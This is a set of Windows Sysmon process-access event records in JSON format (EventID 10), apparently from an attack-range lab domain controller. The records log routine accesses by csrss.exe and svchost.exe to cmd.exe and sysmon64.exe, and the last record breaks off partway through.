{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2227,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.677\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-0010F90C0400}\r\nTargetProcessId: 3912\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.677","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-0010F90C0400}","TargetProcessId":"3912","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2228,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2229,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2230,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2231,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2232,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2233,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2234,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2235,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 